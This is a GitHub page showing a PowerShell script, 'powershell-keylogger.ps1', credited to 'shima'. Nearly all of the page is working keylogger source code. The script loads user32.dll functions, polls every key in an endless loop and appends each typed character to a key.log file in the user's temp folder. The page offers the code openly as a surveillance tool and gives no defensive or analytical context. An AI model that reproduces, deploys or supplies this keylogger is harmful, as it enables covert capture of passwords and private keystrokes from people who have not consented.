-
Notifications
You must be signed in to change notification settings - Fork 9
/
Copy pathpowershell-keylogger.ps1
100 lines (80 loc) · 3.28 KB
/
powershell-keylogger.ps1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
<#
PowerShell keystroke logger by shima
http://vacmf.org/2013/01/23/powershell-keylogger/
#>
function KeyLog {
# MapVirtualKeyMapTypes
# <summary>
# uCode is a virtual-key code and is translated into a scan code.
# If it is a virtual-key code that does not distinguish between left- and
# right-hand keys, the left-hand scan code is returned.
# If there is no translation, the function returns 0.
# </summary>
$MAPVK_VK_TO_VSC = 0x00
# <summary>
# uCode is a scan code and is translated into a virtual-key code that
# does not distinguish between left- and right-hand keys. If there is no
# translation, the function returns 0.
# </summary>
$MAPVK_VSC_TO_VK = 0x01
# <summary>
# uCode is a virtual-key code and is translated into an unshifted
# character value in the low-order word of the return value. Dead keys (diacritics)
# are indicated by setting the top bit of the return value. If there is no
# translation, the function returns 0.
# </summary>
$MAPVK_VK_TO_CHAR = 0x02
# <summary>
# Windows NT/2000/XP: uCode is a scan code and is translated into a
# virtual-key code that distinguishes between left- and right-hand keys. If
# there is no translation, the function returns 0.
# </summary>
$MAPVK_VSC_TO_VK_EX = 0x03
# <summary>
# Not currently documented
# </summary>
$MAPVK_VK_TO_VSC_EX = 0x04
$virtualkc_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)]
public static extern short GetAsyncKeyState(int virtualKeyCode);
'@
$kbstate_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int GetKeyboardState(byte[] keystate);
'@
$mapchar_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int MapVirtualKey(uint uCode, int uMapType);
'@
$tounicode_sig = @'
[DllImport("user32.dll", CharSet=CharSet.Auto)]
public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
'@
$getKeyState = Add-Type -MemberDefinition $virtualkc_sig -name "Win32GetState" -namespace Win32Functions -passThru
$getKBState = Add-Type -MemberDefinition $kbstate_sig -name "Win32MyGetKeyboardState" -namespace Win32Functions -passThru
$getKey = Add-Type -MemberDefinition $mapchar_sig -name "Win32MyMapVirtualKey" -namespace Win32Functions -passThru
$getUnicode = Add-Type -MemberDefinition $tounicode_sig -name "Win32MyToUnicode" -namespace Win32Functions -passThru
while ($true) {
Start-Sleep -Milliseconds 40
$gotit = ""
for ($char = 1; $char -le 254; $char++) {
$vkey = $char
$gotit = $getKeyState::GetAsyncKeyState($vkey)
if ($gotit -eq -32767) {
$l_shift = $getKeyState::GetAsyncKeyState(160)
$r_shift = $getKeyState::GetAsyncKeyState(161)
$caps_lock = [console]::CapsLock
$scancode = $getKey::MapVirtualKey($vkey, $MAPVK_VSC_TO_VK_EX)
$kbstate = New-Object Byte[] 256
$checkkbstate = $getKBState::GetKeyboardState($kbstate)
$mychar = New-Object -TypeName "System.Text.StringBuilder";
$unicode_res = $getUnicode::ToUnicode($vkey, $scancode, $kbstate, $mychar, $mychar.Capacity, 0)
if ($unicode_res -gt 0) {
$logfile = "$env:temp\key.log"
Out-File -FilePath $logfile -Encoding Unicode -Append -InputObject $mychar.ToString()
}
}
}
}
}
KeyLog